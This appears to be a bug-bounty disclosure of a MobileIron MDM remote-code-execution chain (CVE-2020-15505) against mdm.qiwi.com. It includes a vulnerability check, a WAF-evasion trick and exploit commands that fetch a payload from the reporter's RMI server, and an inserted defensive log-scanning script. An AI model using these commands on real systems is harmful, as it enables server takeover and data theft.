Severity: 9.8 High (CVSS3)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

Severity: 7.5 High (CVSS2)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL

EPSS: 0.975 High
EPSS Percentile: 100.0%
Last week, details about 3 CVEs affecting the MobileIron MDM product were disclosed.
When combined, they let an attacker achieve unauthenticated remote code execution through an arbitrary Java deserialization vector:
The following blog post discloses the issues: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
The following GitHub repo is a working PoC to reproduce the issues: https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
The vendor advisory can be found here: https://www.mobileiron.com/en/blog/mobileiron-security-updates-available
Code execution is achieved through arbitrary Java deserialization of the Hessian protocol.
The /mifs/services/LogService endpoint performs such deserialization.
Authentication is required, but it can be bypassed with /.;/ (/mifs/.;/services/LogService).
Use the following check to determine if a host is vulnerable:
curl "<HOST>/mifs/.;/services/LogService" -k -s | grep -q 'This method/operation is not allowed.' && echo "<HOST> - Vulnerable"
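As a defender-side complement to the check above, here is an added example (not part of this report or the PoC repo) that scans web-server access logs for the /.;/ path-parameter bypass of the LogService endpoint: it normalizes each request path the way the servlet container does (dropping ;-path parameters and dot segments) and flags requests whose raw URI reached /mifs/services/ only through such a parameter. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format), not taken from the report.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Sep/2020:10:01:02 +0000] "GET /mifs/user/login.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Sep/2020:10:01:09 +0000] "GET /mifs/.;/services/LogService HTTP/1.1" 200 312 "-" "curl/7.68.0"
10.0.0.9 - - [20/Sep/2020:10:01:15 +0000] "POST /mifs/.;/services/LogService HTTP/1.1" 500 941 "-" "python-requests/2.24"
10.0.0.9 - - [20/Sep/2020:10:02:01 +0000] "POST /mifs/%2e;/services/LogService HTTP/1.1" 500 941 "-" "python-requests/2.24"
10.0.0.7 - - [20/Sep/2020:10:03:00 +0000] "POST /mifs/services/LogService HTTP/1.1" 403 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def normalize_path(raw: str) -> str:
    """Collapse a raw request URI the way the servlet container does before
    mapping it: decode, strip ';param' from every segment, resolve '.' and '..'.
    A filter that inspects only the *raw* URI never sees the resulting path."""
    path = unquote(raw.split("?", 1)[0])
    out = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]  # path parameter such as ".;" becomes "."
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)

def find_bypass_attempts(log_text: str) -> list:
    """Requests that reached /mifs/services/ only after parameter stripping."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = unquote(m["path"].split("?", 1)[0])
        norm = normalize_path(m["path"])
        if norm.startswith("/mifs/services/") and ";" in decoded:
            hits.append({"ip": m["ip"], "method": m["method"], "raw": m["path"],
                         "normalized": norm, "status": m["status"]})
    return hits
```

A 200 on an unauthenticated GET to the normalized LogService path (second sample line) is the strongest signal; the direct POST that got a 403 is the authentication filter working as intended and is not flagged.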
I've discovered that mdm.qiwi.com is vulnerable. The MDM User enrollment interface is reachable on https://mdm.qiwi.com
A WAF is protecting this host and thus blocks out-of-the-box exploit code.
It matches and blocks requests containing the essential Java class-name strings present in the serialized object, such as java.lang / java.io / java.util.
The exploitation uses the code hosted in the following repo: https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
The steps are mostly identical.
This exploit uses a JNDI-based attack with an RMI server running on my VPS.
The final JNDI exploit contains only one string that triggers the WAF: java.util
I've managed to bypass the WAF without breaking the exploit code by replacing it with javb.util.
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C <COMMAND>
java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://<VPS_IP>/<REFERENCE> | sed -b 's/java\.util/javb.util/' > exp_rmi_qiwi
python hessian.py -u "https://mdm.qiwi.com/mifs/.;/services/LogService" -p exp_rmi_qiwi
Here are some proofs of my exploitation attempts to validate effective RCE:
Curl leaking /etc/passwd
Curl leaking /etc/resolv.conf
The curl user-agent is curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2
The requests came from IP 79.142.22.133.
Since we are exploiting the /mifs/ interface, all commands are executed as tomcat.
If we happen to exploit the Management interface (/mics/) through this vulnerability, the commands may be executed by the root user (depending on the version of MobileIron).
By executing arbitrary commands on the server, an attacker can compromise the integrity, availability and confidentiality of the server's data and also pivot to other servers on the internal network.
Since this server is running an MDM product, an attacker can compromise it to attack Qiwi employees and/or compromise their mobile devices.